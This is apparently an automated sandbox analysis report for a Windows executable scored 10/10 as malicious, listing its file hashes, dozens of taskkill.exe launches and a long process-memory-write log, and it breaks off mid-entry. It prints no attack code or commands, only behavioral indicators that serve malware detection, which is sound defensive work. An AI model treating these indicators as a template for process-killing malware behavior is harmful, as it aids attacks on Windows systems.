Analysis
-
max time kernel
112s -
max time network
82s -
platform
windows7_x64 -
resource
win7 -
submitted
24-07-2020 12:52
Static task
static1
Behavioral task
behavioral1
Sample
79385ed97732aee0036e67824de18e28.exe
Resource
win7
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
79385ed97732aee0036e67824de18e28.exe
Resource
win10
windows10_x64
0 signatures
0 seconds
General
-
Target
79385ed97732aee0036e67824de18e28.exe
-
Size
43KB
-
MD5
79385ed97732aee0036e67824de18e28
-
SHA1
2f65a2b8ac21b3505855f7b89551cc1f31bf636e
-
SHA256
8d684a790a5683b8decde9fb5a819c4a164d3032723a151a30ff26d3c2b1aabf
-
SHA512
db1d99884ab384ed571195e7c85105fe1f5bef2cb7e81f1f9380a8aef99f71e9d51a46e5ea6d81acee72aa2c2eb1b371cd11097678cbd27cfa0ef9b254630072
Score
10/10
Malware Config
Signatures
-
Kills process with taskkill 87 IoCs
pid Process 1232 taskkill.exe 2028 taskkill.exe 980 taskkill.exe 912 taskkill.exe 1496 taskkill.exe 1880 taskkill.exe 1984 taskkill.exe 1360 taskkill.exe 1580 taskkill.exe 1932 taskkill.exe 1236 taskkill.exe 1804 taskkill.exe 1556 taskkill.exe 1596 taskkill.exe 788 taskkill.exe 1628 taskkill.exe 804 taskkill.exe 1528 taskkill.exe 1620 taskkill.exe 1268 taskkill.exe 1036 taskkill.exe 512 taskkill.exe 2032 taskkill.exe 1784 taskkill.exe 1800 taskkill.exe 1532 taskkill.exe 2008 taskkill.exe 1400 taskkill.exe 672 taskkill.exe 1988 taskkill.exe 2024 taskkill.exe 272 taskkill.exe 1604 taskkill.exe 1840 taskkill.exe 2016 taskkill.exe 1932 taskkill.exe 1924 taskkill.exe 1892 taskkill.exe 788 taskkill.exe 1840 taskkill.exe 380 taskkill.exe 1356 taskkill.exe 1888 taskkill.exe 1316 taskkill.exe 884 taskkill.exe 1168 taskkill.exe 2040 taskkill.exe 1760 taskkill.exe 1916 taskkill.exe 1112 taskkill.exe 2012 taskkill.exe 1788 taskkill.exe 548 taskkill.exe 2032 taskkill.exe 1996 taskkill.exe 820 taskkill.exe 1596 taskkill.exe 1268 taskkill.exe 1524 taskkill.exe 1032 taskkill.exe 1908 taskkill.exe 1944 taskkill.exe 884 taskkill.exe 2016 taskkill.exe 1632 taskkill.exe 1052 taskkill.exe 1392 taskkill.exe 1884 taskkill.exe 480 taskkill.exe 1804 taskkill.exe 1768 taskkill.exe 1608 taskkill.exe 1920 taskkill.exe 1552 taskkill.exe 740 taskkill.exe 2012 taskkill.exe 1872 taskkill.exe 468 taskkill.exe 608 taskkill.exe 1404 taskkill.exe 884 taskkill.exe 1604 taskkill.exe 1472 taskkill.exe 1316 taskkill.exe 1252 taskkill.exe 672 taskkill.exe 1340 taskkill.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 672 timeout.exe -
Suspicious use of WriteProcessMemory 740 IoCs
description pid Process procid_target PID 1456 wrote to memory of 912 1456 79385ed97732aee0036e67824de18e28.exe 25 PID 1456 wrote to memory of 912 1456 79385ed97732aee0036e67824de18e28.exe 25 PID 1456 wrote to memory of 912 1456 79385ed97732aee0036e67824de18e28.exe 25 PID 1456 wrote to memory of 912 1456 79385ed97732aee0036e67824de18e28.exe 25 PID 912 wrote to memory of 292 912 cmd.exe 27 PID 912 wrote to memory of 292 912 cmd.exe 27 PID 912 wrote to memory of 292 912 cmd.exe 27 PID 912 wrote to memory of 292 912 cmd.exe 27 PID 1456 wrote to memory of 1796 1456 79385ed97732aee0036e67824de18e28.exe 30 PID 1456 wrote to memory of 1796 1456 79385ed97732aee0036e67824de18e28.exe 30 PID 1456 wrote to memory of 1796 1456 79385ed97732aee0036e67824de18e28.exe 30 PID 1456 wrote to memory of 1796 1456 79385ed97732aee0036e67824de18e28.exe 30 PID 1456 wrote to memory of 1816 1456 79385ed97732aee0036e67824de18e28.exe 32 PID 1456 wrote to memory of 1816 1456 79385ed97732aee0036e67824de18e28.exe 32 PID 1456 wrote to memory of 1816 1456 79385ed97732aee0036e67824de18e28.exe 32 PID 1456 wrote to memory of 1816 1456 79385ed97732aee0036e67824de18e28.exe 32 PID 1456 wrote to memory of 1776 1456 79385ed97732aee0036e67824de18e28.exe 34 PID 1456 wrote to memory of 1776 1456 79385ed97732aee0036e67824de18e28.exe 34 PID 1456 wrote to memory of 1776 1456 79385ed97732aee0036e67824de18e28.exe 34 PID 1456 wrote to memory of 1776 1456 79385ed97732aee0036e67824de18e28.exe 34 PID 1456 wrote to memory of 1784 1456 79385ed97732aee0036e67824de18e28.exe 36 PID 1456 wrote to memory of 1784 1456 79385ed97732aee0036e67824de18e28.exe 36 PID 1456 wrote to memory of 1784 1456 79385ed97732aee0036e67824de18e28.exe 36 PID 1456 wrote to memory of 1784 1456 79385ed97732aee0036e67824de18e28.exe 36 PID 1456 wrote to memory of 1576 1456 79385ed97732aee0036e67824de18e28.exe 38 PID 1456 wrote to memory of 1576 1456 79385ed97732aee0036e67824de18e28.exe 38 PID 1456 wrote to memory of 1576 1456 79385ed97732aee0036e67824de18e28.exe 38 PID 1456 wrote to memory of 1576 1456 79385ed97732aee0036e67824de18e28.exe 38 PID 1576 wrote to memory of 1556 1576 cmd.exe 40 PID 1576 wrote to memory of 1556 1576 cmd.exe 40 PID 1576 wrote to memory of 1556 1576 cmd.exe 40 PID 1576 wrote to memory of 1556 1576 cmd.exe 40 PID 1456 wrote to memory of 1552 1456 79385ed97732aee0036e67824de18e28.exe 41 PID 1456 wrote to memory of 1552 1456 79385ed97732aee0036e67824de18e28.exe 41 PID 1456 wrote to memory of 1552 1456 79385ed97732aee0036e67824de18e28.exe 41 PID 1456 wrote to memory of 1552 1456 79385ed97732aee0036e67824de18e28.exe 41 PID 1456 wrote to memory of 1908 1456 79385ed97732aee0036e67824de18e28.exe 43 PID 1456 wrote to memory of 1908 1456 79385ed97732aee0036e67824de18e28.exe 43 PID 1456 wrote to memory of 1908 1456 79385ed97732aee0036e67824de18e28.exe 43 PID 1456 wrote to memory of 1908 1456 79385ed97732aee0036e67824de18e28.exe 43 PID 1908 wrote to memory of 1924 1908 cmd.exe 45 PID 1908 wrote to memory of 1924 1908 cmd.exe 45 PID 1908 wrote to memory of 1924 1908 cmd.exe 45 PID 1908 wrote to memory of 1924 1908 cmd.exe 45 PID 1456 wrote to memory of 2028 1456 79385ed97732aee0036e67824de18e28.exe 47 PID 1456 wrote to memory of 2028 1456 79385ed97732aee0036e67824de18e28.exe 47 PID 1456 wrote to memory of 2028 1456 79385ed97732aee0036e67824de18e28.exe 47 PID 1456 wrote to memory of 2028 1456 79385ed97732aee0036e67824de18e28.exe 47 PID 2028 wrote to memory of 1996 2028 cmd.exe 49 PID 2028 wrote to memory of 1996 2028 cmd.exe 49 PID 2028 wrote to memory of 1996 2028 cmd.exe 49 PID 2028 wrote to memory of 1996 2028 cmd.exe 49 PID 1456 wrote to memory of 1896 1456 79385ed97732aee0036e67824de18e28.exe 50 PID 1456 wrote to memory of 1896 1456 79385ed97732aee0036e67824de18e28.exe 50 PID 1456 wrote to memory of 1896 1456 79385ed97732aee0036e67824de18e28.exe 50 PID 1456 wrote to memory of 1896 1456 79385ed97732aee0036e67824de18e28.exe 50 PID 1896 wrote to memory of 1892 1896 cmd.exe 52 PID 1896 wrote to memory of 1892 1896 cmd.exe 52 PID 1896 wrote to memory of 1892 1896 cmd.exe 52 PID 1896 wrote to memory of 1892 1896 cmd.exe 52 PID 1456 wrote to memory of 1392 1456 79385ed97732aee0036e67824de18e28.exe 53 PID 1456 wrote to memory of 1392 1456 79385ed97732aee0036e67824de18e28.exe 53 PID 1456 wrote to memory of 1392 1456 79385ed97732aee0036e67824de18e28.exe 53 PID 1456 wrote to memory of 1392 1456 79385ed97732aee0036e67824de18e28.exe 53 PID 1392 wrote to memory of 884 1392 cmd.exe 55 PID 1392 wrote to memory of 884 1392 cmd.exe 55 PID 1392 wrote to memory of 884 1392 cmd.exe 55 PID 1392 wrote to memory of 884 1392 cmd.exe 55 PID 1456 wrote to memory of 1540 1456 79385ed97732aee0036e67824de18e28.exe 56 PID 1456 wrote to memory of 1540 1456 79385ed97732aee0036e67824de18e28.exe 56 PID 1456 wrote to memory of 1540 1456 79385ed97732aee0036e67824de18e28.exe 56 PID 1456 wrote to memory of 1540 1456 79385ed97732aee0036e67824de18e28.exe 56 PID 1540 wrote to memory of 788 1540 cmd.exe 58 PID 1540 wrote to memory of 788 1540 cmd.exe 58 PID 1540 wrote to memory of 788 1540 cmd.exe 58 PID 1540 wrote to memory of 788 1540 cmd.exe 58 PID 1456 wrote to memory of 304 1456 79385ed97732aee0036e67824de18e28.exe 59 PID 1456 wrote to memory of 304 1456 79385ed97732aee0036e67824de18e28.exe 59 PID 1456 wrote to memory of 304 1456 79385ed97732aee0036e67824de18e28.exe 59 PID 1456 wrote to memory of 304 1456 79385ed97732aee0036e67824de18e28.exe 59 PID 304 wrote to memory of 1604 304 cmd.exe 61 PID 304 wrote to memory of 1604 304 cmd.exe 61 PID 304 wrote to memory of 1604 304 cmd.exe 61 PID 304 wrote to memory of 1604 304 cmd.exe 61 PID 1456 wrote to memory of 1360 1456 79385ed97732aee0036e67824de18e28.exe 62 PID 1456 wrote to memory of 1360 1456 79385ed97732aee0036e67824de18e28.exe 62 PID 1456 wrote to memory of 1360 1456 79385ed97732aee0036e67824de18e28.exe 62 PID 1456 wrote to memory of 1360 1456 79385ed97732aee0036e67824de18e28.exe 62 PID 1360 wrote to memory of 1840 1360 cmd.exe 64 PID 1360 wrote to memory of 1840 1360 cmd.exe 64 PID 1360 wrote to memory of 1840 1360 cmd.exe 64 PID 1360 wrote to memory of 1840 1360 cmd.exe 64 PID 1456 wrote to memory of 1768 1456 79385ed97732aee0036e67824de18e28.exe 65 PID 1456 wrote to memory of 1768 1456 79385ed97732aee0036e67824de18e28.exe 65 PID 1456 wrote to memory of 1768 1456 79385ed97732aee0036e67824de18e28.exe 65 PID 1456 wrote to memory of 1768 1456 79385ed97732aee0036e67824de18e28.exe 65 PID 1768 wrote to memory of 1596 1768 cmd.exe 67 PID 1768 wrote to memory of 1596 1768 cmd.exe 67 PID 1768 wrote to memory of 1596 1768 cmd.exe 67 PID 1768 wrote to memory of 1596 1768 cmd.exe 67 PID 1456 wrote to memory of 1852 1456 79385ed97732aee0036e67824de18e28.exe 68 PID 1456 wrote to memory of 1852 1456 79385ed97732aee0036e67824de18e28.exe 68 PID 1456 wrote to memory of 1852 1456 79385ed97732aee0036e67824de18e28.exe 68 PID 1456 wrote to memory of 1852 1456 79385ed97732aee0036e67824de18e28.exe 68 PID 1852 wrote to memory of 1880 1852 cmd.exe 70 PID 1852 wrote to memory of 1880 1852 cmd.exe 70 PID 1852 wrote to memory of 1880 1852 cmd.exe 70 PID 1852 wrote to memory of 1880 1852 cmd.exe 70 PID 1456 wrote to memory of 1980 1456 79385ed97732aee0036e67824de18e28.exe 71 PID 1456 wrote to memory of 1980 1456 79385ed97732aee0036e67824de18e28.exe 71 PID 1456 wrote to memory of 1980 1456 79385ed97732aee0036e67824de18e28.exe 71 PID 1456 wrote to memory of 1980 1456 79385ed97732aee0036e67824de18e28.exe 71 PID 1980 wrote to memory of 1920 1980 cmd.exe 73 PID 1980 wrote to memory of 1920 1980 cmd.exe 73 PID 1980 wrote to memory of 1920 1980 cmd.exe 73 PID 1980 wrote to memory of 1920 1980 cmd.exe 73 PID 1456 wrote to memory of 1988 1456 79385ed97732aee0036e67824de18e28.exe 74 PID 1456 wrote to memory of 1988 1456 79385ed97732aee0036e67824de18e28.exe 74 PID 1456 wrote to memory of 1988 1456 79385ed97732aee0036e67824de18e28.exe 74 PID 1456 wrote to memory of 1988 1456 79385ed97732aee0036e67824de18e28.exe 74 PID 1988 wrote to memory of 2032 1988 cmd.exe 76 PID 1988 wrote to memory of 2032 1988 cmd.exe 76 PID 1988 wrote to memory of 2032 1988 cmd.exe 76 PID 1988 wrote to memory of 2032 1988 cmd.exe 76 PID 1456 wrote to memory of 1056 1456 79385ed97732aee0036e67824de18e28.exe 77 PID 1456 wrote to memory of 1056 1456 79385ed97732aee0036e67824de18e28.exe 77 PID 1456 wrote to memory of 1056 1456 79385ed97732aee0036e67824de18e28.exe 77 PID 1456 wrote to memory of 1056 1456 79385ed97732aee0036e67824de18e28.exe 77 PID 1056 wrote to memory of 1884 1056 cmd.exe 79 PID 1056 wrote to memory of 1884 1056 cmd.exe 79 PID 1056 wrote to memory of 1884 1056 cmd.exe 79 PID 1056 wrote to memory of 1884 1056 cmd.exe 79 PID 1456 wrote to memory of 1464 1456 79385ed97732aee0036e67824de18e28.exe 80 PID 1456 wrote to memory of 1464 1456 79385ed97732aee0036e67824de18e28.exe 80 PID 1456 wrote to memory of 1464 1456 79385ed97732aee0036e67824de18e28.exe 80 PID 1456 wrote to memory of 1464 1456 79385ed97732aee0036e67824de18e28.exe 80 PID 1464 wrote to memory of 820 1464 cmd.exe 82 PID 1464 wrote to memory of 820 1464 cmd.exe 82 PID 1464 wrote to memory of 820 1464 cmd.exe 82 PID 1464 wrote to memory of 820 1464 cmd.exe 82 PID 1456 wrote to memory of 740 1456 79385ed97732aee0036e67824de18e28.exe 83 PID 1456 wrote to memory of 740 1456 79385ed97732aee0036e67824de18e28.exe 83 PID 1456 wrote to memory of 740 1456 79385ed97732aee0036e67824de18e28.exe 83 PID 1456 wrote to memory of 740 1456 79385ed97732aee0036e67824de18e28.exe 83 PID 740 wrote to memory of 480 740 cmd.exe 85 PID 740 wrote to memory of 480 740 cmd.exe 85 PID 740 wrote to memory of 480 740 cmd.exe 85 PID 740 wrote to memory of 480 740 cmd.exe 85 PID 1456 wrote to memory of 1800 1456 79385ed97732aee0036e67824de18e28.exe 86 PID 1456 wrote to memory of 1800 1456 79385ed97732aee0036e67824de18e28.exe 86 PID 1456 wrote to memory of 1800 1456 79385ed97732aee0036e67824de18e28.exe 86 PID 1456 wrote to memory of 1800 1456 79385ed97732aee0036e67824de18e28.exe 86 PID 1800 wrote to memory of 1604 1800 cmd.exe 88 PID 1800 wrote to memory of 1604 1800 cmd.exe 88 PID 1800 wrote to memory of 1604 1800 cmd.exe 88 PID 1800 wrote to memory of 1604 1800 cmd.exe 88 PID 1456 wrote to memory of 1732 1456 79385ed97732aee0036e67824de18e28.exe 89 PID 1456 wrote to memory of 1732 1456 79385ed97732aee0036e67824de18e28.exe 89 PID 1456 wrote to memory of 1732 1456 79385ed97732aee0036e67824de18e28.exe 89 PID 1456 wrote to memory of 1732 1456 79385ed97732aee0036e67824de18e28.exe 89 PID 1732 wrote to memory of 1840 1732 cmd.exe 91 PID 1732 wrote to memory of 1840 1732 cmd.exe 91 PID 1732 wrote to memory of 1840 1732 cmd.exe 91 PID 1732 wrote to memory of 1840 1732 cmd.exe 91 PID 1456 wrote to memory of 1580 1456 79385ed97732aee0036e67824de18e28.exe 92 PID 1456 wrote to memory of 1580 1456 79385ed97732aee0036e67824de18e28.exe 92 PID 1456 wrote to memory of 1580 1456 79385ed97732aee0036e67824de18e28.exe 92 PID 1456 wrote to memory of 1580 1456 79385ed97732aee0036e67824de18e28.exe 92 PID 1580 wrote to memory of 1596 1580 cmd.exe 94 PID 1580 wrote to memory of 1596 1580 cmd.exe 94 PID 1580 wrote to memory of 1596 1580 cmd.exe 94 PID 1580 wrote to memory of 1596 1580 cmd.exe 94 PID 1456 wrote to memory of 268 1456 79385ed97732aee0036e67824de18e28.exe 95 PID 1456 wrote to memory of 268 1456 79385ed97732aee0036e67824de18e28.exe 95 PID 1456 wrote to memory of 268 1456 79385ed97732aee0036e67824de18e28.exe 95 PID 1456 wrote to memory of 268 1456 79385ed97732aee0036e67824de18e28.exe 95 PID 268 wrote to memory of 1552 268 cmd.exe 97 PID 268 wrote to memory of 1552 268 cmd.exe 97 PID 268 wrote to memory of 1552 268 cmd.exe 97 PID 268 wrote to memory of 1552 268 cmd.exe 97 PID 1456 wrote to memory of 1852 1456 79385ed97732aee0036e67824de18e28.exe 98 PID 1456 wrote to memory of 1852 1456 79385ed97732aee0036e67824de18e28.exe 98 PID 1456 wrote to memory of 1852 1456 79385ed97732aee0036e67824de18e28.exe 98 PID 1456 wrote to memory of 1852 1456 79385ed97732aee0036e67824de18e28.exe 98 PID 1852 wrote to memory of 2016 1852 cmd.exe 100 PID 1852 wrote to memory of 2016 1852 cmd.exe 100 PID 1852 wrote to memory of 2016 1852 cmd.exe 100 PID 1852 wrote to memory of 2016 1852 cmd.exe 100 PID 1456 wrote to memory of 1976 1456 79385ed97732aee0036e67824de18e28.exe 101 PID 1456 wrote to memory of 1976 1456 79385ed97732aee0036e67824de18e28.exe 101 PID 1456 wrote to memory of 1976 1456 79385ed97732aee0036e67824de18e28.exe 101 PID 1456 wrote to memory of 1976 1456 79385ed97732aee0036e67824de18e28.exe 101 PID 1976 wrote to memory of 1112 1976 cmd.exe 103 PID 1976 wrote to memory of 1112 1976 cmd.exe 103 PID 1976 wrote to memory of 1112 1976 cmd.exe 103 PID 1976 wrote to memory of 1112 1976 cmd.exe 103 PID 1456 wrote to memory of 1988 1456 79385ed97732aee0036e67824de18e28.exe 104 PID 1456 wrote to memory of 1988 1456 79385ed97732aee0036e67824de18e28.exe 104 PID 1456 wrote to memory of 1988 1456 79385ed97732aee0036e67824de18e28.exe 104 PID 1456 wrote to memory of 1988 1456 79385ed97732aee0036e67824de18e28.exe 104 PID 1988 wrote to memory of 1472 1988 cmd.exe 106 PID 1988 wrote to memory of 1472 1988 cmd.exe 106 PID 1988 wrote to memory of 1472 1988 cmd.exe 106 PID 1988 wrote to memory of 1472 1988 cmd.exe 106 PID 1456 wrote to memory of 1892 1456 79385ed97732aee0036e67824de18e28.exe 107 PID 1456 wrote to memory of 1892 1456 79385ed97732aee0036e67824de18e28.exe 107 PID 1456 wrote to memory of 1892 1456 79385ed97732aee0036e67824de18e28.exe 107 PID 1456 wrote to memory of 1892 1456 79385ed97732aee0036e67824de18e28.exe 107 PID 1892 wrote to memory of 1032 1892 cmd.exe 109 PID 1892 wrote to memory of 1032 1892 cmd.exe 109 PID 1892 wrote to memory of 1032 1892 cmd.exe 109 PID 1892 wrote to memory of 1032 1892 cmd.exe 109 PID 1456 wrote to memory of 1464 1456 79385ed97732aee0036e67824de18e28.exe 110 PID 1456 wrote to memory of 1464 1456 79385ed97732aee0036e67824de18e28.exe 110 PID 1456 wrote to memory of 1464 1456 79385ed97732aee0036e67824de18e28.exe 110 PID 1456 wrote to memory of 1464 1456 79385ed97732aee0036e67824de18e28.exe 110 PID 1464 wrote to memory of 1804 1464 cmd.exe 112 PID 1464 wrote to memory of 1804 1464 cmd.exe 112 PID 1464 wrote to memory of 1804 1464 cmd.exe 112 PID 1464 wrote to memory of 1804 1464 cmd.exe 112 PID 1456 wrote to memory of 740 1456 79385ed97732aee0036e67824de18e28.exe 113 PID 1456 wrote to memory of 740 1456 79385ed97732aee0036e67824de18e28.exe 113 PID 1456 wrote to memory of 740 1456 79385ed97732aee0036e67824de18e28.exe 113 PID 1456 wrote to memory of 740 1456 79385ed97732aee0036e67824de18e28.exe 113 PID 740 wrote to memory of 1232 740 cmd.exe 115 PID 740 wrote to memory of 1232 740 cmd.exe 115 PID 740 wrote to memory of 1232 740 cmd.exe 115 PID 740 wrote to memory of 1232 740 cmd.exe 115 PID 1456 wrote to memory of 1800 1456 79385ed97732aee0036e67824de18e28.exe 116 PID 1456 wrote to memory of 1800 1456 79385ed97732aee0036e67824de18e28.exe 116 PID 1456 wrote to memory of 1800 1456 79385ed97732aee0036e67824de18e28.exe 116 PID 1456 wrote to memory of 1800 1456 79385ed97732aee0036e67824de18e28.exe 116 PID 1800 wrote to memory of 1620 1800 cmd.exe 118 PID 1800 wrote to memory of 1620 1800 cmd.exe 118 PID 1800 wrote to memory of 1620 1800 cmd.exe 118 PID 1800 wrote to memory of 1620 1800 cmd.exe 118 PID 1456 wrote to memory of 1756 1456 79385ed97732aee0036e67824de18e28.exe 119 PID 1456 wrote to memory of 1756 1456 79385ed97732aee0036e67824de18e28.exe 119 PID 1456 wrote to memory of 1756 1456 79385ed97732aee0036e67824de18e28.exe 119 PID 1456 wrote to memory of 1756 1456 79385ed97732aee0036e67824de18e28.exe 119 PID 1756 wrote to memory of 672 1756 cmd.exe 121 PID 1756 wrote to memory of 672 1756 cmd.exe 121 PID 1756 wrote to memory of 672 1756 cmd.exe 121 PID 1756 wrote to memory of 672 1756 cmd.exe 121 PID 1456 wrote to memory of 1624 1456 79385ed97732aee0036e67824de18e28.exe 122 PID 1456 wrote to memory of 1624 1456 79385ed97732aee0036e67824de18e28.exe 122 PID 1456 wrote to memory of 1624 1456 79385ed97732aee0036e67824de18e28.exe 122 PID 1456 wrote to memory of 1624 1456 79385ed97732aee0036e67824de18e28.exe 122 PID 1624 wrote to memory of 1932 1624 cmd.exe 124 PID 1624 wrote to memory of 1932 1624 cmd.exe 124 PID 1624 wrote to memory of 1932 1624 cmd.exe 124 PID 1624 wrote to memory of 1932 1624 cmd.exe 124 PID 1456 wrote to memory of 1880 1456 79385ed97732aee0036e67824de18e28.exe 125 PID 1456 wrote to memory of 1880 1456 79385ed97732aee0036e67824de18e28.exe 125 PID 1456 wrote to memory of 1880 1456 79385ed97732aee0036e67824de18e28.exe 125 PID 1456 wrote to memory of 1880 1456 79385ed97732aee0036e67824de18e28.exe 125 PID 1880 wrote to memory of 1984 1880 cmd.exe 127 PID 1880 wrote to memory of 1984 1880 cmd.exe 127 PID 1880 wrote to memory of 1984 1880 cmd.exe 127 PID 1880 wrote to memory of 1984 1880 cmd.exe 127 PID 1456 wrote to memory of 980 1456 79385ed97732aee0036e67824de18e28.exe 128 PID 1456 wrote to memory of 980 1456 79385ed97732aee0036e67824de18e28.exe 128 PID 1456 wrote to memory of 980 1456 79385ed97732aee0036e67824de18e28.exe 128 PID 1456 wrote to memory of 980 1456 79385ed97732aee0036e67824de18e28.exe 128 PID 980 wrote to memory of 1908 980 cmd.exe 130 PID 980 wrote to memory of 1908 980 cmd.exe 130 PID 980 wrote to memory of 1908 980 cmd.exe 130 PID 980 wrote to memory of 1908 980 cmd.exe 130 PID 1456 wrote to memory of 1992 1456 79385ed97732aee0036e67824de18e28.exe 131 PID 1456 wrote to memory of 1992 1456 79385ed97732aee0036e67824de18e28.exe 131 PID 1456 wrote to memory of 1992 1456 79385ed97732aee0036e67824de18e28.exe 131 PID 1456 wrote to memory of 1992 1456 79385ed97732aee0036e67824de18e28.exe 131 PID 1992 wrote to memory of 1888 1992 cmd.exe 133 PID 1992 wrote to memory of 1888 1992 cmd.exe 133 PID 1992 wrote to memory of 1888 1992 cmd.exe 133 PID 1992 wrote to memory of 1888 1992 cmd.exe 133 PID 1456 wrote to memory of 2028 1456 79385ed97732aee0036e67824de18e28.exe 134 PID 1456 wrote to memory of 2028 1456 79385ed97732aee0036e67824de18e28.exe 134 PID 1456 wrote to memory of 2028 1456 79385ed97732aee0036e67824de18e28.exe 134 PID 1456 wrote to memory of 2028 1456 79385ed97732aee0036e67824de18e28.exe 134 PID 2028 wrote to memory of 2012 2028 cmd.exe 136 PID 2028 wrote to memory of 2012 2028 cmd.exe 136 PID 2028 wrote to memory of 2012 2028 cmd.exe 136 PID 2028 wrote to memory of 2012 2028 cmd.exe 136 PID 1456 wrote to memory of 608 1456 79385ed97732aee0036e67824de18e28.exe 137 PID 1456 wrote to memory of 608 1456 79385ed97732aee0036e67824de18e28.exe 137 PID 1456 wrote to memory of 608 1456 79385ed97732aee0036e67824de18e28.exe 137 PID 1456 wrote to memory of 608 1456 79385ed97732aee0036e67824de18e28.exe 137 PID 608 wrote to memory of 1316 608 cmd.exe 139 PID 608 wrote to memory of 1316 608 cmd.exe 139 PID 608 wrote to memory of 1316 608 cmd.exe 139 PID 608 wrote to memory of 1316 608 cmd.exe 139 PID 1456 wrote to memory of 1392 1456 79385ed97732aee0036e67824de18e28.exe 140 PID 1456 wrote to memory of 1392 1456 79385ed97732aee0036e67824de18e28.exe 140 PID 1456 wrote to memory of 1392 1456 79385ed97732aee0036e67824de18e28.exe 140 PID 1456 wrote to memory of 1392 1456 79385ed97732aee0036e67824de18e28.exe 140 PID 1392 wrote to memory of 1268 1392 cmd.exe 142 PID 1392 wrote to memory of 1268 1392 cmd.exe 142 PID 1392 wrote to memory of 1268 1392 cmd.exe 142 PID 1392 wrote to memory of 1268 1392 cmd.exe 142 PID 1456 wrote to memory of 1540 1456 79385ed97732aee0036e67824de18e28.exe 143 PID 1456 wrote to memory of 1540 1456 79385ed97732aee0036e67824de18e28.exe 143 PID 1456 wrote to memory of 1540 1456 79385ed97732aee0036e67824de18e28.exe 143 PID 1456 wrote to memory of 1540 1456 79385ed97732aee0036e67824de18e28.exe 143 PID 1540 wrote to memory of 884 1540 cmd.exe 145 PID 1540 wrote to memory of 884 1540 cmd.exe 145 PID 1540 wrote to memory of 884 1540 cmd.exe 145 PID 1540 wrote to memory of 884 1540 cmd.exe 145 PID 1456 wrote to memory of 548 1456 79385ed97732aee0036e67824de18e28.exe 146 PID 1456 wrote to memory of 548 1456 79385ed97732aee0036e67824de18e28.exe 146 PID 1456 wrote to memory of 548 1456 79385ed97732aee0036e67824de18e28.exe 146 PID 1456 wrote to memory of 548 1456 79385ed97732aee0036e67824de18e28.exe 146 PID 548 wrote to memory of 788 548 cmd.exe 148 PID 548 wrote to memory of 788 548 cmd.exe 148 PID 548 wrote to memory of 788 548 cmd.exe 148 PID 548 wrote to memory of 788 548 cmd.exe 148 PID 1456 wrote to memory of 1356 1456 79385ed97732aee0036e67824de18e28.exe 149 PID 1456 wrote to memory of 1356 1456 79385ed97732aee0036e67824de18e28.exe 149 PID 1456 wrote to memory of 1356 1456 79385ed97732aee0036e67824de18e28.exe 149 PID 1456 wrote to memory of 1356 1456 79385ed97732aee0036e67824de18e28.exe 149 PID 1356 wrote to memory of 1788 1356 cmd.exe 151 PID 1356 wrote to memory of 1788 1356 cmd.exe 151 PID 1356 wrote to memory of 1788 1356 cmd.exe 151 PID 1356 wrote to memory of 1788 1356 cmd.exe 151 PID 1456 wrote to memory of 1572 1456 79385ed97732aee0036e67824de18e28.exe 152 PID 1456 wrote to memory of 1572 1456 79385ed97732aee0036e67824de18e28.exe 152 PID 1456 wrote to memory of 1572 1456 79385ed97732aee0036e67824de18e28.exe 152 PID 1456 wrote to memory of 1572 1456 79385ed97732aee0036e67824de18e28.exe 152 PID 1572 wrote to memory of 1768 1572 cmd.exe 154 PID 1572 wrote to memory of 1768 1572 cmd.exe 154 PID 1572 wrote to memory of 1768 1572 cmd.exe 154 PID 1572 wrote to memory of 1768 1572 cmd.exe 154 PID 1456 wrote to memory of 1580 1456 79385ed97732aee0036e67824de18e28.exe 155 PID 1456 wrote to memory of 1580 1456 79385ed97732aee0036e67824de18e28.exe 155 PID 1456 wrote to memory of 1580 1456 79385ed97732aee0036e67824de18e28.exe 155 PID 1456 wrote to memory of 1580 1456 79385ed97732aee0036e67824de18e28.exe 155 PID 1580 wrote to memory of 1944 1580 cmd.exe 157 PID 1580 wrote to memory of 1944 1580 cmd.exe 157 PID 1580 wrote to memory of 1944 1580 cmd.exe 157 PID 1580 wrote to memory of 1944 1580 cmd.exe 157 PID 1456 wrote to memory of 2040 1456 79385ed97732aee0036e67824de18e28.exe 158 PID 1456 wrote to memory of 2040 1456 79385ed97732aee0036e67824de18e28.exe 158 PID 1456 wrote to memory of 2040 1456 79385ed97732aee0036e67824de18e28.exe 158 PID 1456 wrote to memory of 2040 1456 79385ed97732aee0036e67824de18e28.exe 158 PID 2040 wrote to memory of 2016 2040 cmd.exe 160 PID 2040 wrote to memory of 2016 2040 cmd.exe 160 PID 2040 wrote to memory of 2016 2040 cmd.exe 160 PID 2040 wrote to memory of 2016 2040 cmd.exe 160 PID 1456 wrote to memory of 512 1456 79385ed97732aee0036e67824de18e28.exe 161 PID 1456 wrote to memory of 512 1456 79385ed97732aee0036e67824de18e28.exe 161 PID 1456 wrote to memory of 512 1456 79385ed97732aee0036e67824de18e28.exe 161 PID 1456 wrote to memory of 512 1456 79385ed97732aee0036e67824de18e28.exe 161 PID 512 wrote to memory of 1168 512 cmd.exe 163 PID 512 wrote to memory of 1168 512 cmd.exe 163 PID 512 wrote to memory of 1168 512 cmd.exe 163 PID 512 wrote to memory of 1168 512 cmd.exe 163 PID 1456 wrote to memory of 1404 1456 79385ed97732aee0036e67824de18e28.exe 164 PID 1456 wrote to memory of 1404 1456 79385ed97732aee0036e67824de18e28.exe 164 PID 1456 wrote to memory of 1404 1456 79385ed97732aee0036e67824de18e28.exe 164 PID 1456 wrote to memory of 1404 1456 79385ed97732aee0036e67824de18e28.exe 164 PID 1404 wrote to memory of 2012 1404 cmd.exe 166 PID 1404 wrote to memory of 2012 1404 cmd.exe 166 PID 1404 wrote to memory of 2012 1404 cmd.exe 166 PID 1404 wrote to memory of 2012 1404 cmd.exe 166 PID 1456 wrote to memory of 1452 1456 79385ed97732aee0036e67824de18e28.exe 167 PID 1456 wrote to memory of 1452 1456 79385ed97732aee0036e67824de18e28.exe 167 PID 1456 wrote to memory of 1452 1456 79385ed97732aee0036e67824de18e28.exe 167 PID 1456 wrote to memory of 1452 1456 79385ed97732aee0036e67824de18e28.exe 167 PID 1452 wrote to memory of 1316 1452 cmd.exe 169 PID 1452 wrote to memory of 1316 1452 cmd.exe 169 PID 1452 wrote to memory of 1316 1452 cmd.exe 169 PID 1452 wrote to memory of 1316 1452 cmd.exe 169 PID 1456 wrote to memory of 380 1456 79385ed97732aee0036e67824de18e28.exe 170 PID 1456 wrote to memory of 380 1456 79385ed97732aee0036e67824de18e28.exe 170 PID 1456 wrote to memory of 380 1456 